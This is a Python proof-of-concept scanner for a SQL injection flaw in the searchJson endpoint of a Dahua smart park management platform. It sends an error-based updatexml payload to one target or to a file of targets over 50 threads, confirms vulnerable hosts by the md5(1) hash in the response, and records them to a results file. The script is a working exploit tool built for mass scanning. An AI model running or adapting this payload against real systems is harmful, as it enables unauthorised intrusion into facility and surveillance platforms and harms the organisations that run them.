import requests,argparse,sys
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    banner ="""██████╗  █████╗ ██╗  ██╗██╗   ██╗ █████╗       ███████╗███████╗ █████╗ ██████╗  ██████╗██╗  ██╗     ██╗███████╗ ██████╗ ███╗   ██╗
██╔══██╗██╔══██╗██║  ██║██║   ██║██╔══██╗      ██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝██║  ██║     ██║██╔════╝██╔═══██╗████╗  ██║
██║  ██║███████║███████║██║   ██║███████║█████╗███████╗█████╗  ███████║██████╔╝██║     ███████║     ██║███████╗██║   ██║██╔██╗ ██║
██║  ██║██╔══██║██╔══██║██║   ██║██╔══██║╚════╝╚════██║██╔══╝  ██╔══██║██╔══██╗██║     ██╔══██║██   ██║╚════██║██║   ██║██║╚██╗██║
██████╔╝██║  ██║██║  ██║╚██████╔╝██║  ██║      ███████║███████╗██║  ██║██║  ██║╚██████╗██║  ██║╚█████╔╝███████║╚██████╔╝██║ ╚████║
╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═╝      ╚══════╝╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝ ╚════╝ ╚══════╝ ╚═════╝ ╚═╝  ╚═══╝
                                                                                                                                  

"""
    print(banner)
def main():
    banner()
    parser = argparse.ArgumentParser(description="大华智慧园区综合管理平台-searchJson SQL注入漏洞")
    parser.add_argument('-u','-url',dest='url',type=str,help="Please input your URL")
    parser.add_argument('-f','-file',dest='file',type=str,help="Please input your File path")
    args = parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list = []
        with open(args.file,'r',encoding='utf-8')as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp = Pool(50)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")

def poc(target):
    payload = "/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D"
    headers = {
        'Accept-Encoding': 'gzip, deflate, br',
        'Connection': 'close',
    }
    try:
        res1 = requests.get(url=target+payload,headers=headers)
        if 'c4ca4238a0b923820dcc509a6f75849' in res1.text:
            print(f'[+]{target}存在漏洞')
            with open('dahua-result.txt','a',encoding='utf-8')as f:
                f.write(target+'\n')
        else:
            print(f'[-]{target}不存在漏洞')
    except:
        pass

if __name__ == "__main__":
    main()
